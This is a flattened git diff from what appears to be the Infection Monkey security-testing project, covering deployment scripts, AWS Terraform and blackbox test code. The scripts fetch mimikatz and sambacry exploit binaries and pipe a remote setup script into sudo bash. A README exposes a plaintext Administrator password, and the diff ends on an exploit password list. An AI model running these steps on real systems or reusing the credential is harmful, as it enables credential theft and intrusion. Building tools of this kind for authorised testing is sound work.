sudo apt-get install libffi-dev upx libssl-dev libc++1
requirements_monkey="$INFECTION_MONKEY_DIR/requirements.txt"
${python_cmd} -m pip install -r "${requirements_monkey}" --user --upgrade || handle_error
agents=${3:-true}
# Download binaries # Download binaries
log_message "Downloading binaries" if [ "$agents" = true ] ; then
wget -c -N -P ${ISLAND_BINARIES_PATH} ${LINUX_32_BINARY_URL} log_message "Downloading binaries"
wget -c -N -P ${ISLAND_BINARIES_PATH} ${LINUX_64_BINARY_URL} if exists wget; then
wget -c -N -P ${ISLAND_BINARIES_PATH} ${WINDOWS_32_BINARY_URL} wget -c -N -P ${ISLAND_BINARIES_PATH} ${LINUX_32_BINARY_URL}
wget -c -N -P ${ISLAND_BINARIES_PATH} ${WINDOWS_64_BINARY_URL} wget -c -N -P ${ISLAND_BINARIES_PATH} ${LINUX_64_BINARY_URL}
wget -c -N -P ${ISLAND_BINARIES_PATH} ${WINDOWS_32_BINARY_URL}
wget -c -N -P ${ISLAND_BINARIES_PATH} ${WINDOWS_64_BINARY_URL}
else
curl -o ${ISLAND_BINARIES_PATH}\monkey-linux-32 ${LINUX_32_BINARY_URL}
curl -o ${ISLAND_BINARIES_PATH}\monkey-linux-64 ${LINUX_64_BINARY_URL}
curl -o ${ISLAND_BINARIES_PATH}\monkey-windows-32.exe ${WINDOWS_32_BINARY_URL}
curl -o ${ISLAND_BINARIES_PATH}\monkey-windows-64.exe ${WINDOWS_64_BINARY_URL}
fi
fi
# Allow them to be executed # Allow them to be executed
chmod a+x "$ISLAND_BINARIES_PATH/$LINUX_32_BINARY_NAME" chmod a+x "$ISLAND_BINARIES_PATH/$LINUX_32_BINARY_NAME"
chmod a+x "$ISLAND_BINARIES_PATH/$LINUX_64_BINARY_NAME" chmod a+x "$ISLAND_BINARIES_PATH/$LINUX_64_BINARY_NAME"
# Get machine type/kernel version
kernel=`uname -m`
linux_dist=`lsb_release -a 2> /dev/null`
# If a user haven't installed mongo manually check if we can install it with our script # If a user haven't installed mongo manually check if we can install it with our script
log_message "Installing MongoDB" if ! exists mongod; then
${ISLAND_PATH}/linux/install_mongo.sh ${MONGO_BIN_PATH} || handle_error log_message "Installing MongoDB"
"${ISLAND_PATH}"/linux/install_mongo.sh ${MONGO_PATH} || handle_error
fi
log_message "Installing openssl" log_message "Installing openssl"
sudo apt-get install openssl sudo apt-get install openssl
# Generate SSL certificate # Generate SSL certificate
log_message "Generating certificate" log_message "Generating certificate"
cd ${ISLAND_PATH} || handle_error
openssl genrsa -out cc/server.key 1024 || handle_error
openssl req -new -key cc/server.key -out cc/server.csr \
-subj "/C=GB/ST=London/L=London/O=Global Security/OU=Monkey Department/CN=monkey.com" || handle_error
openssl x509 -req -days 366 -in cc/server.csr -signkey cc/server.key -out cc/server.crt || handle_error
"${ISLAND_PATH}"/linux/create_certificate.sh ${ISLAND_PATH}/cc
sudo chmod +x ${ISLAND_PATH}/linux/create_certificate.sh || handle_error
${ISLAND_PATH}/linux/create_certificate.sh || handle_error
# Install npm
log_message "Installing npm"
sudo apt-get install npm
# Update node # Update node
log_message "Updating node" if ! exists npm; then
curl -sL https://deb.nodesource.com/setup_10.x | sudo -E bash - log_message "Installing nodejs"
sudo apt-get install -y nodejs node_src=https://deb.nodesource.com/setup_12.x
if exists curl; then
curl -sL $node_src | sudo -E bash -
else
wget -q -O - $node_src | sudo -E bash -
fi
sudo apt-get install -y nodejs
fi
pushd "$ISLAND_PATH/cc/ui" || handle_error
npm install sass-loader node-sass webpack --save-dev
npm update
log_message "Generating front end" log_message "Generating front end"
cd "$ISLAND_PATH/cc/ui" || handle_error
npm update
npm run dist npm run dist
popd || handle_error
# Monkey setup # Making dir for binaries
log_message "Installing monkey requirements" mkdir "${MONKEY_BIN_DIR}"
sudo apt-get install python-pip python-dev libffi-dev upx libssl-dev libc++1
cd ${monkey_home}/monkey/infection_monkey || handle_error
python -m pip install --user -r requirements_linux.txt || handle_error
# Build samba # Download sambacry binaries
log_message "Building samba binaries" log_message "Downloading sambacry binaries"
sudo apt-get install gcc-multilib # shellcheck disable=SC2086
cd ${monkey_home}/monkey/infection_monkey/exploit/sambacry_monkey_runner if exists wget; then
sudo chmod +x ./build.sh || handle_error wget -c -N -P "${MONKEY_BIN_DIR}" ${SAMBACRY_64_BINARY_URL}
./build.sh wget -c -N -P "${MONKEY_BIN_DIR}" ${SAMBACRY_32_BINARY_URL}
else
curl -o ${MONKEY_BIN_DIR}/sc_monkey_runner64.so ${SAMBACRY_64_BINARY_URL}
curl -o ${MONKEY_BIN_DIR}/sc_monkey_runner32.so ${SAMBACRY_32_BINARY_URL}
fi
# Download traceroute binaries
log_message "Downloading traceroute binaries"
# shellcheck disable=SC2086
if exists wget; then
wget -c -N -P "${MONKEY_BIN_DIR}" ${TRACEROUTE_64_BINARY_URL}
wget -c -N -P "${MONKEY_BIN_DIR}" ${TRACEROUTE_32_BINARY_URL}
else
curl -o ${MONKEY_BIN_DIR}/traceroute64 ${TRACEROUTE_64_BINARY_URL}
curl -o ${MONKEY_BIN_DIR}/traceroute32 ${TRACEROUTE_32_BINARY_URL}
fi
sudo chmod +x ${monkey_home}/monkey/infection_monkey/build_linux.sh sudo chmod +x "${INFECTION_MONKEY_DIR}/build_linux.sh"
log_message "Deployment script finished." log_message "Deployment script finished."
exit 0 exit 0

View File

@ -1,17 +1,40 @@
function Deploy-Windows([String] $monkey_home = (Get-Item -Path ".\").FullName, [String] $branch = "develop"){ param(
# Import the config variables [Parameter(Mandatory = $false, Position = 0)]
. ./config.ps1 [String] $monkey_home = (Get-Item -Path ".\").FullName,
"Config variables from config.ps1 imported"
# If we want monkey in current dir we need to create an empty folder for source files
if ( (Join-Path $monkey_home '') -eq (Join-Path (Get-Item -Path ".\").FullName '') ){
$monkey_home = Join-Path -Path $monkey_home -ChildPath $MONKEY_FOLDER_NAME
}
[Parameter(Mandatory = $false, Position = 1)]
[System.String]
$branch = "develop",
[Parameter(Mandatory = $false, Position = 2)]
[Bool]
$agents = $true
)
function Deploy-Windows([String] $monkey_home = (Get-Item -Path ".\").FullName, [String] $branch = "develop")
{
Write-Output "Downloading to $monkey_home"
Write-Output "Branch $branch"
# Set variables for script execution # Set variables for script execution
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
$webClient = New-Object System.Net.WebClient $webClient = New-Object System.Net.WebClient
# Import the config variables
$config_filename = New-TemporaryFile
$config_filename = "config.ps1"
$config_url = "https://raw.githubusercontent.com/guardicore/monkey/" + $branch + "/deployment_scripts/config.ps1"
$webClient.DownloadFile($config_url, $config_filename)
. ./config.ps1
"Config variables from config.ps1 imported"
Remove-Item $config_filename
# If we want monkey in current dir we need to create an empty folder for source files
if ((Join-Path $monkey_home '') -eq (Join-Path (Get-Item -Path ".\").FullName ''))
{
$monkey_home = Join-Path -Path $monkey_home -ChildPath $MONKEY_FOLDER_NAME
}
# We check if git is installed # We check if git is installed
try try
{ {
@ -25,15 +48,22 @@ function Deploy-Windows([String] $monkey_home = (Get-Item -Path ".\").FullName,
} }
# Download the monkey # Download the monkey
$output = cmd.exe /c "git clone --single-branch -b $branch $MONKEY_GIT_URL $monkey_home 2>&1" $command = "git clone --single-branch --recurse-submodules -b $branch $MONKEY_GIT_URL $monkey_home 2>&1"
Write-Output $command
$output = cmd.exe /c $command
$binDir = (Join-Path -Path $monkey_home -ChildPath $MONKEY_ISLAND_DIR | Join-Path -ChildPath "\bin") $binDir = (Join-Path -Path $monkey_home -ChildPath $MONKEY_ISLAND_DIR | Join-Path -ChildPath "\bin")
if ( $output -like "*already exists and is not an empty directory.*"){ if ($output -like "*already exists and is not an empty directory.*")
{
"Assuming you already have the source directory. If not, make sure to set an empty directory as monkey's home directory." "Assuming you already have the source directory. If not, make sure to set an empty directory as monkey's home directory."
} elseif ($output -like "fatal:*"){ }
elseif ($output -like "fatal:*")
{
"Error while cloning monkey from the repository:" "Error while cloning monkey from the repository:"
$output $output
return return
} else { }
else
{
"Monkey cloned from the repository" "Monkey cloned from the repository"
# Create bin directory # Create bin directory
New-Item -ItemType directory -path $binDir New-Item -ItemType directory -path $binDir
@ -44,59 +74,68 @@ function Deploy-Windows([String] $monkey_home = (Get-Item -Path ".\").FullName,
try try
{ {
$version = cmd.exe /c '"python" --version 2>&1' $version = cmd.exe /c '"python" --version 2>&1'
if ( $version -like 'Python 2.7.*' ) { if ($version -like 'Python 3.*')
"Python 2.7.* was found, installing dependancies" {
} else { "Python 3.* was found, installing dependencies"
}
else
{
throw System.Management.Automation.CommandNotFoundException throw System.Management.Automation.CommandNotFoundException
} }
} }
catch [System.Management.Automation.CommandNotFoundException] catch [System.Management.Automation.CommandNotFoundException]
{ {
"Downloading python 2.7 ..." "Downloading python 3 ..."
"Select 'add to PATH' when installing"
$webClient.DownloadFile($PYTHON_URL, $TEMP_PYTHON_INSTALLER) $webClient.DownloadFile($PYTHON_URL, $TEMP_PYTHON_INSTALLER)
Start-Process -Wait $TEMP_PYTHON_INSTALLER -ErrorAction Stop Start-Process -Wait $TEMP_PYTHON_INSTALLER -ErrorAction Stop
$env:Path = [System.Environment]::GetEnvironmentVariable("Path","Machine") $env:Path = [System.Environment]::GetEnvironmentVariable("Path", "Machine") + ";" + [System.Environment]::GetEnvironmentVariable("Path", "User")
Remove-Item $TEMP_PYTHON_INSTALLER Remove-Item $TEMP_PYTHON_INSTALLER
# Check if installed correctly # Check if installed correctly
$version = cmd.exe /c '"python" --version 2>&1' $version = cmd.exe /c '"python" --version 2>&1'
if ( $version -like '* is not recognized*' ) { if ($version -like '* is not recognized*')
"Python is not found in PATH. Add it manually or reinstall python." {
"Python is not found in PATH. Add it to PATH and relaunch the script."
return return
} }
} }
# Set python home dir
$PYTHON_PATH = Split-Path -Path (Get-Command python | Select-Object -ExpandProperty Source)
# Get vcforpython27 before installing requirements
"Downloading Visual C++ Compiler for Python 2.7 ..."
$webClient.DownloadFile($VC_FOR_PYTHON27_URL, $TEMP_VC_FOR_PYTHON27_INSTALLER)
Start-Process -Wait $TEMP_VC_FOR_PYTHON27_INSTALLER -ErrorAction Stop
$env:Path = [System.Environment]::GetEnvironmentVariable("Path","Machine")
Remove-Item $TEMP_VC_FOR_PYTHON27_INSTALLER
# Install requirements for island
$islandRequirements = Join-Path -Path $monkey_home -ChildPath $MONKEY_ISLAND_DIR | Join-Path -ChildPath "\requirements.txt" -ErrorAction Stop
"Upgrading pip..." "Upgrading pip..."
$output = cmd.exe /c 'python -m pip install --user --upgrade pip 2>&1' $output = cmd.exe /c 'python -m pip install --user --upgrade pip 2>&1'
$output $output
if ( $output -like '*No module named pip*' ) { if ($output -like '*No module named pip*')
{
"Make sure pip module is installed and re-run this script." "Make sure pip module is installed and re-run this script."
return return
} }
"Installing python packages for island"
$islandRequirements = Join-Path -Path $monkey_home -ChildPath $MONKEY_ISLAND_DIR | Join-Path -ChildPath "\requirements.txt" -ErrorAction Stop
& python -m pip install --user -r $islandRequirements & python -m pip install --user -r $islandRequirements
# Install requirements for monkey "Installing python packages for monkey"
$monkeyRequirements = Join-Path -Path $monkey_home -ChildPath $MONKEY_DIR | Join-Path -ChildPath "\requirements_windows.txt" $monkeyRequirements = Join-Path -Path $monkey_home -ChildPath $MONKEY_DIR | Join-Path -ChildPath "\requirements.txt"
& python -m pip install --user -r $monkeyRequirements & python -m pip install --user -r $monkeyRequirements
$user_python_dir = cmd.exe /c 'py -m site --user-site'
$user_python_dir = Join-Path (Split-Path $user_python_dir) -ChildPath "\Scripts"
if (!($ENV:Path | Select-String -SimpleMatch $user_python_dir))
{
"Adding python scripts path to user's env"
$env:Path += ";" + $user_python_dir
[Environment]::SetEnvironmentVariable("Path", $env:Path, "User")
}
# Download mongodb # Download mongodb
if(!(Test-Path -Path (Join-Path -Path $binDir -ChildPath "mongodb") )){ if (!(Test-Path -Path (Join-Path -Path $binDir -ChildPath "mongodb")))
{
"Downloading mongodb ..." "Downloading mongodb ..."
$webClient.DownloadFile($MONGODB_URL, $TEMP_MONGODB_ZIP) $webClient.DownloadFile($MONGODB_URL, $TEMP_MONGODB_ZIP)
"Unzipping mongodb" "Unzipping mongodb"
Expand-Archive $TEMP_MONGODB_ZIP -DestinationPath $binDir Expand-Archive $TEMP_MONGODB_ZIP -DestinationPath $binDir
# Get unzipped folder's name # Get unzipped folder's name
$mongodb_folder = Get-ChildItem -Path $binDir | Where-Object -FilterScript {($_.Name -like "mongodb*")} | Select-Object -ExpandProperty Name $mongodb_folder = Get-ChildItem -Path $binDir | Where-Object -FilterScript {
($_.Name -like "mongodb*")
} | Select-Object -ExpandProperty Name
# Move all files from extracted folder to mongodb folder # Move all files from extracted folder to mongodb folder
New-Item -ItemType directory -Path (Join-Path -Path $binDir -ChildPath "mongodb") New-Item -ItemType directory -Path (Join-Path -Path $binDir -ChildPath "mongodb")
New-Item -ItemType directory -Path (Join-Path -Path $monkey_home -ChildPath $MONKEY_ISLAND_DIR | Join-Path -ChildPath "db") New-Item -ItemType directory -Path (Join-Path -Path $monkey_home -ChildPath $MONKEY_ISLAND_DIR | Join-Path -ChildPath "db")
@ -127,23 +166,30 @@ function Deploy-Windows([String] $monkey_home = (Get-Item -Path ".\").FullName,
. .\windows\create_certificate.bat . .\windows\create_certificate.bat
Pop-Location Pop-Location
# Adding binaries if ($agents)
"Adding binaries" {
$binaries = (Join-Path -Path $monkey_home -ChildPath $MONKEY_ISLAND_DIR | Join-Path -ChildPath "\cc\binaries") # Adding binaries
New-Item -ItemType directory -path $binaries -ErrorAction SilentlyContinue "Adding binaries"
$webClient.DownloadFile($LINUX_32_BINARY_URL, (Join-Path -Path $binaries -ChildPath $LINUX_32_BINARY_PATH)) $binaries = (Join-Path -Path $monkey_home -ChildPath $MONKEY_ISLAND_DIR | Join-Path -ChildPath "\cc\binaries")
$webClient.DownloadFile($LINUX_64_BINARY_URL, (Join-Path -Path $binaries -ChildPath $LINUX_64_BINARY_PATH)) New-Item -ItemType directory -path $binaries -ErrorAction SilentlyContinue
$webClient.DownloadFile($WINDOWS_32_BINARY_URL, (Join-Path -Path $binaries -ChildPath $WINDOWS_32_BINARY_PATH)) $webClient.DownloadFile($LINUX_32_BINARY_URL, (Join-Path -Path $binaries -ChildPath $LINUX_32_BINARY_PATH))
$webClient.DownloadFile($WINDOWS_64_BINARY_URL, (Join-Path -Path $binaries -ChildPath $WINDOWS_64_BINARY_PATH)) $webClient.DownloadFile($LINUX_64_BINARY_URL, (Join-Path -Path $binaries -ChildPath $LINUX_64_BINARY_PATH))
$webClient.DownloadFile($WINDOWS_32_BINARY_URL, (Join-Path -Path $binaries -ChildPath $WINDOWS_32_BINARY_PATH))
$webClient.DownloadFile($WINDOWS_64_BINARY_URL, (Join-Path -Path $binaries -ChildPath $WINDOWS_64_BINARY_PATH))
}
# Check if NPM installed # Check if NPM installed
"Installing npm" "Installing npm"
try try
{ {
$version = cmd.exe /c '"npm" --version 2>&1' $version = cmd.exe /c '"npm" --version 2>&1'
if ( $version -like "*is not recognized*"){ if ($version -like "*is not recognized*")
{
throw System.Management.Automation.CommandNotFoundException throw System.Management.Automation.CommandNotFoundException
} else { }
else
{
"Npm already installed" "Npm already installed"
} }
} }
@ -152,7 +198,7 @@ function Deploy-Windows([String] $monkey_home = (Get-Item -Path ".\").FullName,
"Downloading npm ..." "Downloading npm ..."
$webClient.DownloadFile($NPM_URL, $TEMP_NPM_INSTALLER) $webClient.DownloadFile($NPM_URL, $TEMP_NPM_INSTALLER)
Start-Process -Wait $TEMP_NPM_INSTALLER Start-Process -Wait $TEMP_NPM_INSTALLER
$env:Path = [System.Environment]::GetEnvironmentVariable("Path","Machine") $env:Path = [System.Environment]::GetEnvironmentVariable("Path", "Machine")
Remove-Item $TEMP_NPM_INSTALLER Remove-Item $TEMP_NPM_INSTALLER
} }
@ -162,18 +208,13 @@ function Deploy-Windows([String] $monkey_home = (Get-Item -Path ".\").FullName,
& npm run dist & npm run dist
Pop-Location Pop-Location
# Install pywin32
"Downloading pywin32"
$webClient.DownloadFile($PYWIN32_URL, $TEMP_PYWIN32_INSTALLER)
Start-Process -Wait $TEMP_PYWIN32_INSTALLER -ErrorAction Stop
Remove-Item $TEMP_PYWIN32_INSTALLER
# Create infection_monkey/bin directory if not already present # Create infection_monkey/bin directory if not already present
$binDir = (Join-Path -Path $monkey_home -ChildPath $MONKEY_DIR | Join-Path -ChildPath "\bin") $binDir = (Join-Path -Path $monkey_home -ChildPath $MONKEY_DIR | Join-Path -ChildPath "\bin")
New-Item -ItemType directory -path $binaries -ErrorAction SilentlyContinue New-Item -ItemType directory -path $binaries -ErrorAction SilentlyContinue
# Download upx # Download upx
if(!(Test-Path -Path (Join-Path -Path $binDir -ChildPath "upx.exe") )){ if (!(Test-Path -Path (Join-Path -Path $binDir -ChildPath "upx.exe")))
{
"Downloading upx ..." "Downloading upx ..."
$webClient.DownloadFile($UPX_URL, $TEMP_UPX_ZIP) $webClient.DownloadFile($UPX_URL, $TEMP_UPX_ZIP)
"Unzipping upx" "Unzipping upx"
@ -187,12 +228,14 @@ function Deploy-Windows([String] $monkey_home = (Get-Item -Path ".\").FullName,
# Download mimikatz binaries # Download mimikatz binaries
$mk32_path = Join-Path -Path $binDir -ChildPath $MK32_DLL $mk32_path = Join-Path -Path $binDir -ChildPath $MK32_DLL
if(!(Test-Path -Path $mk32_path )){ if (!(Test-Path -Path $mk32_path))
{
"Downloading mimikatz 32 binary" "Downloading mimikatz 32 binary"
$webClient.DownloadFile($MK32_DLL_URL, $mk32_path) $webClient.DownloadFile($MK32_DLL_URL, $mk32_path)
} }
$mk64_path = Join-Path -Path $binDir -ChildPath $MK64_DLL $mk64_path = Join-Path -Path $binDir -ChildPath $MK64_DLL
if(!(Test-Path -Path $mk64_path )){ if (!(Test-Path -Path $mk64_path))
{
"Downloading mimikatz 64 binary" "Downloading mimikatz 64 binary"
$webClient.DownloadFile($MK64_DLL_URL, $mk64_path) $webClient.DownloadFile($MK64_DLL_URL, $mk64_path)
} }
@ -200,12 +243,14 @@ function Deploy-Windows([String] $monkey_home = (Get-Item -Path ".\").FullName,
# Download sambacry binaries # Download sambacry binaries
$samba_path = Join-Path -Path $monkey_home -ChildPath $SAMBA_BINARIES_DIR $samba_path = Join-Path -Path $monkey_home -ChildPath $SAMBA_BINARIES_DIR
$samba32_path = Join-Path -Path $samba_path -ChildPath $SAMBA_32_BINARY_NAME $samba32_path = Join-Path -Path $samba_path -ChildPath $SAMBA_32_BINARY_NAME
if(!(Test-Path -Path $samba32_path )){ if (!(Test-Path -Path $samba32_path))
{
"Downloading sambacry 32 binary" "Downloading sambacry 32 binary"
$webClient.DownloadFile($SAMBA_32_BINARY_URL, $samba32_path) $webClient.DownloadFile($SAMBA_32_BINARY_URL, $samba32_path)
} }
$samba64_path = Join-Path -Path $samba_path -ChildPath $SAMBA_64_BINARY_NAME $samba64_path = Join-Path -Path $samba_path -ChildPath $SAMBA_64_BINARY_NAME
if(!(Test-Path -Path $samba64_path )){ if (!(Test-Path -Path $samba64_path))
{
"Downloading sambacry 64 binary" "Downloading sambacry 64 binary"
$webClient.DownloadFile($SAMBA_64_BINARY_URL, $samba64_path) $webClient.DownloadFile($SAMBA_64_BINARY_URL, $samba64_path)
} }
@ -213,3 +258,4 @@ function Deploy-Windows([String] $monkey_home = (Get-Item -Path ".\").FullName,
"Script finished" "Script finished"
} }
Deploy-Windows -monkey_home $monkey_home -branch $branch

View File

@ -1,8 +0,0 @@
SET command=. .\deploy_windows.ps1; Deploy-Windows
if NOT "%~1" == "" (
SET "command=%command% -monkey_home %~1"
)
if NOT "%~2" == "" (
SET "command=%command% -branch %~2"
)
powershell -ExecutionPolicy ByPass -Command %command%

View File

@ -2,7 +2,7 @@ FROM debian:stretch-slim
LABEL MAINTAINER="theonlydoo <theonlydoo@gmail.com>" LABEL MAINTAINER="theonlydoo <theonlydoo@gmail.com>"
ARG RELEASE=1.6 ARG RELEASE=1.8.0
ARG DEBIAN_FRONTEND=noninteractive ARG DEBIAN_FRONTEND=noninteractive
EXPOSE 5000 EXPOSE 5000

View File

@ -0,0 +1,57 @@
# Monkey maker
## About
Monkey maker is an environment on AWS that
is designed for monkey binary building.
This environment is deployed using terraform scripts
located in this directory.
## Setup
To setup you need to put `accessKeys` file into `./aws_keys` directory.
Contents of `accessKeys` file should be as follows:
```ini
[default]
aws_access_key_id = <...>
aws_secret_access_key = <...>
```
Also review `./terraform/config.tf` file.
Launch the environment by going into `terraform` folder and running
```
terraform init
terraform apply
```
## Usage
To login to windows use Administrator: %HwuzI!Uzsyfa=cB*XaQ6xxHqopfj)h) credentials
You'll find docker files in `/home/ubuntu/docker_envs/linux/...`
To build docker image for 32 bit linux:
```
cd /home/ubuntu/docker_envs/linux/py3-32
sudo docker build -t builder32 .
```
To build docker image for 64 bit linux:
```
cd /home/ubuntu/docker_envs/linux/py3-64
sudo docker build -t builder64 .
```
To build 32 bit monkey binary:
```
cd /home/ubuntu/monkey_folder/monkey
sudo docker run -v "$(pwd):/src" builder32 -c "export SRCDIR=/src/infection_monkey && /entrypoint.sh"
```
To build 64 bit monkey binary:
```
cd /home/ubuntu/monkey_folder/monkey
sudo docker run -v "$(pwd):/src" builder64 -c "export SRCDIR=/src/infection_monkey && /entrypoint.sh"
```

4
envs/monkey_maker/aws_keys/.gitignore vendored Normal file
View File

@ -0,0 +1,4 @@
# Ignore everything in this directory
*
# Except this file
!.gitignore

View File

@ -0,0 +1,5 @@
provider "aws" {
version = "~> 2.0"
region = "eu-central-1"
shared_credentials_file = "../aws_keys/accessKeys"
}

View File

@ -0,0 +1,61 @@
resource "aws_vpc" "monkey_maker" {
cidr_block = "10.0.0.0/24"
enable_dns_support = true
tags = {
Name = "monkey_maker_vpc"
}
}
resource "aws_internet_gateway" "monkey_maker_gateway" {
vpc_id = "${aws_vpc.monkey_maker.id}"
tags = {
Name = "monkey_maker_gateway"
}
}
// create routing table which points to the internet gateway
resource "aws_route_table" "monkey_maker_route" {
vpc_id = "${aws_vpc.monkey_maker.id}"
route {
cidr_block = "0.0.0.0/0"
gateway_id = "${aws_internet_gateway.monkey_maker_gateway.id}"
}
tags = {
Name = "monkey_maker_route"
}
}
// associate the routing table with the subnet
resource "aws_route_table_association" "subnet-association" {
subnet_id = "${aws_subnet.main.id}"
route_table_id = "${aws_route_table.monkey_maker_route.id}"
}
resource "aws_subnet" "main" {
vpc_id = "${aws_vpc.monkey_maker.id}"
cidr_block = "10.0.0.0/24"
tags = {
Name = "Main"
}
}
resource "aws_security_group" "monkey_maker_sg" {
name = "monkey_maker_sg"
description = "Allow remote access to the island"
vpc_id = "${aws_vpc.monkey_maker.id}"
egress {
from_port = 0
to_port = 0
protocol = "-1"
cidr_blocks = ["0.0.0.0/0"]
}
tags = {
Name = "monkey_maker_sg"
}
}

View File

@ -0,0 +1,25 @@
resource "aws_instance" "island_windows" {
ami = "ami-033b3ef27f8d1881d"
instance_type = "t2.micro"
private_ip = "10.0.0.251"
subnet_id = "${aws_subnet.main.id}"
key_name = "monkey_maker"
tags = {
Name = "monkey_maker_windows"
}
vpc_security_group_ids = ["${aws_security_group.monkey_maker_sg.id}"]
associate_public_ip_address = true
}
resource "aws_instance" "island_linux" {
ami = "ami-0495203541087740a"
instance_type = "t2.micro"
private_ip = "10.0.0.252"
subnet_id = "${aws_subnet.main.id}"
key_name = "monkey_maker"
tags = {
Name = "monkey_maker_linux"
}
vpc_security_group_ids = ["${aws_security_group.monkey_maker_sg.id}"]
associate_public_ip_address = true
}

View File

@ -0,0 +1,8 @@
from abc import ABCMeta, abstractmethod
class Analyzer(object, metaclass=ABCMeta):
@abstractmethod
def analyze_test_results(self):
raise NotImplementedError()

View File

@ -1,7 +1,8 @@
from envs.monkey_zoo.blackbox.analyzers.analyzer import Analyzer
from envs.monkey_zoo.blackbox.analyzers.analyzer_log import AnalyzerLog from envs.monkey_zoo.blackbox.analyzers.analyzer_log import AnalyzerLog
class CommunicationAnalyzer(object): class CommunicationAnalyzer(Analyzer):
def __init__(self, island_client, machine_ips): def __init__(self, island_client, machine_ips):
self.island_client = island_client self.island_client = island_client

View File

@ -0,0 +1,59 @@
import logging
from datetime import timedelta
from envs.monkey_zoo.blackbox.analyzers.analyzer import Analyzer
from envs.monkey_zoo.blackbox.island_client.monkey_island_client import MonkeyIslandClient
MAX_ALLOWED_SINGLE_PAGE_TIME = timedelta(seconds=2)
MAX_ALLOWED_TOTAL_TIME = timedelta(seconds=5)
REPORT_URLS = [
"api/report/security",
"api/attack/report",
"api/report/zero_trust/findings",
"api/report/zero_trust/principles",
"api/report/zero_trust/pillars"
]
logger = logging.getLogger(__name__)
class PerformanceAnalyzer(Analyzer):
def __init__(self, island_client: MonkeyIslandClient, break_if_took_too_long=False):
self.break_if_took_too_long = break_if_took_too_long
self.island_client = island_client
def analyze_test_results(self) -> bool:
if not self.island_client.is_all_monkeys_dead():
raise RuntimeError("Can't test report times since not all Monkeys have died.")
# Collect timings for all pages
self.island_client.clear_caches()
report_resource_to_response_time = {}
for url in REPORT_URLS:
report_resource_to_response_time[url] = self.island_client.get_elapsed_for_get_request(url)
# Calculate total time and check each page
single_page_time_less_then_max = True
total_time = timedelta()
for page, elapsed in report_resource_to_response_time.items():
logger.info(f"page {page} took {str(elapsed)}")
total_time += elapsed
if elapsed > MAX_ALLOWED_SINGLE_PAGE_TIME:
single_page_time_less_then_max = False
total_time_less_then_max = total_time < MAX_ALLOWED_TOTAL_TIME
logger.info(f"total time is {str(total_time)}")
performance_is_good_enough = total_time_less_then_max and single_page_time_less_then_max
if self.break_if_took_too_long and not performance_is_good_enough:
logger.warning(
"Calling breakpoint - pausing to enable investigation of island. Type 'c' to continue once you're done "
"investigating. Type 'p timings' and 'p total_time' to see performance information."
)
breakpoint()
return performance_is_good_enough

View File

@ -1,3 +1,4 @@
from datetime import timedelta
from time import sleep from time import sleep
import json import json
@ -85,3 +86,23 @@ class MonkeyIslandClient(object):
def is_all_monkeys_dead(self): def is_all_monkeys_dead(self):
query = {'dead': False} query = {'dead': False}
return len(self.find_monkeys_in_db(query)) == 0 return len(self.find_monkeys_in_db(query)) == 0
def clear_caches(self):
"""
Tries to clear caches.
:raises: If error (by error code), raises the error
:return: The response
"""
response = self.requests.get("api/test/clear_caches")
response.raise_for_status()
return response
def get_elapsed_for_get_request(self, url):
response = self.requests.get(url)
if response.ok:
LOGGER.debug(f"Got ok for {url} content peek:\n{response.content[:120].strip()}")
return response.elapsed
else:
LOGGER.error(f"Trying to get {url} but got unexpected {str(response)}")
# instead of raising for status, mark failed responses as maxtime
return timedelta.max()

View File

@ -1,4 +1,5 @@
import requests import requests
import functools
# SHA3-512 of '1234567890!@#$%^&*()_nothing_up_my_sleeve_1234567890!@#$%^&*()' # SHA3-512 of '1234567890!@#$%^&*()_nothing_up_my_sleeve_1234567890!@#$%^&*()'
import logging import logging
@ -8,6 +9,7 @@ NO_AUTH_CREDS = '55e97c9dcfd22b8079189ddaeea9bce8125887e3237b800c6176c9afa80d206
LOGGER = logging.getLogger(__name__) LOGGER = logging.getLogger(__name__)
# noinspection PyArgumentList
class MonkeyIslandRequests(object): class MonkeyIslandRequests(object):
def __init__(self, server_address): def __init__(self, server_address):
self.addr = "https://{IP}/".format(IP=server_address) self.addr = "https://{IP}/".format(IP=server_address)
@ -21,29 +23,52 @@ class MonkeyIslandRequests(object):
"Unable to connect to island, aborting! Error information: {}. Server: {}".format(err, self.addr)) "Unable to connect to island, aborting! Error information: {}. Server: {}".format(err, self.addr))
assert False assert False
class _Decorators:
@classmethod
def refresh_jwt_token(cls, request_function):
@functools.wraps(request_function)
def request_function_wrapper(self, *args, **kwargs):
self.token = self.try_get_jwt_from_server()
# noinspection PyArgumentList
return request_function(self, *args, **kwargs)
return request_function_wrapper
def get_jwt_from_server(self): def get_jwt_from_server(self):
resp = requests.post(self.addr + "api/auth", resp = requests.post(self.addr + "api/auth", # noqa: DUO123
json={"username": NO_AUTH_CREDS, "password": NO_AUTH_CREDS}, json={"username": NO_AUTH_CREDS, "password": NO_AUTH_CREDS},
verify=False) verify=False)
return resp.json()["access_token"] return resp.json()["access_token"]
@_Decorators.refresh_jwt_token
def get(self, url, data=None): def get(self, url, data=None):
return requests.get(self.addr + url, return requests.get(self.addr + url, # noqa: DUO123
headers=self.get_jwt_header(), headers=self.get_jwt_header(),
params=data, params=data,
verify=False) verify=False)
@_Decorators.refresh_jwt_token
def post(self, url, data): def post(self, url, data):
return requests.post(self.addr + url, return requests.post(self.addr + url, # noqa: DUO123
data=data, data=data,
headers=self.get_jwt_header(), headers=self.get_jwt_header(),
verify=False) verify=False)
@_Decorators.refresh_jwt_token
def post_json(self, url, dict_data): def post_json(self, url, dict_data):
return requests.post(self.addr + url, return requests.post(self.addr + url, # noqa: DUO123
json=dict_data, json=dict_data,
headers=self.get_jwt_header(), headers=self.get_jwt_header(),
verify=False) verify=False)
@_Decorators.refresh_jwt_token
def delete(self, url):
return requests.delete( # noqa: DOU123
self.addr + url,
headers=self.get_jwt_header(),
verify=False
)
@_Decorators.refresh_jwt_token
def get_jwt_header(self): def get_jwt_header(self):
return {"Authorization": "JWT " + self.token} return {"Authorization": "JWT " + self.token}

View File

@ -24,7 +24,7 @@
"local_network_scan": false, "local_network_scan": false,
"subnet_scan_list": [ "subnet_scan_list": [
"10.2.2.3", "10.2.2.3",
"10.2.2.10" "10.2.2.2"
] ]
}, },
"network_analysis": { "network_analysis": {

View File

@ -2,15 +2,18 @@
"basic": { "basic": {
"credentials": { "credentials": {
"exploit_password_list": [ "exploit_password_list": [
"`))jU7L(w}", "Password1!",
